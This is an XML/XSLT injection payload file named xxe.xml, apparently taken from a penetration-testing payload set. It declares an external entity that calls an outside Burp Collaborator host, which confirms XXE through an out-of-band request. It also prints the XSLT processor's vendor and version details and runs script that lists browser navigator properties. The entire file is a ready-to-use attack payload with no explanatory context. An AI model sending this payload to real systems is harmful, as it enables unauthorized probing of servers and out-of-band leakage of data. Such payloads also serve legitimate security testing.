xxe.xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE ss [<!ENTITY xxe SYSTEM "http://x42lu7w86sqc3lgt0qi0l632ctil6a.burpcollaborator.net/">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
 xxe: &xxe;
 <html>
 <body>
 Version: <xsl:value-of select="system-property('xsl:version')" /><br />
 Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
 Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
 <xsl:if test="system-property('xsl:product-name')">
 Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
 </xsl:if>
 <xsl:if test="system-property('xsl:product-version')">
 Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
 </xsl:if>
 <xsl:if test="system-property('xsl:is-schema-aware')">
 Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
 </xsl:if>
 <xsl:if test="system-property('xsl:supports-serialization')">
 Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')" /><br />
 </xsl:if>
 <xsl:if test="system-property('xsl:supports-backwards-compatibility')">
 Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')" /><br />
 </xsl:if>
 <br />Navigator Object (JavaScript stuff):
 <pre><font size="2"><script>for (i in navigator) { document.write('<br />navigator.' + i +
' = ' + navigator[i]);} </script><div id="output"/><script> if
(navigator.userAgent.search("Firefox")!=-1) { output=''; for (i in navigator) {
if(navigator[i]) {output+='navigator.'+i+' = '+navigator[i]+'\n';}} var txtNode =
document.createTextNode(output); document.getElementById("output").appendChild(txtNode)
}</script></font></pre>
 </body>
 </html>
</xsl:template>
</xsl:stylesheet>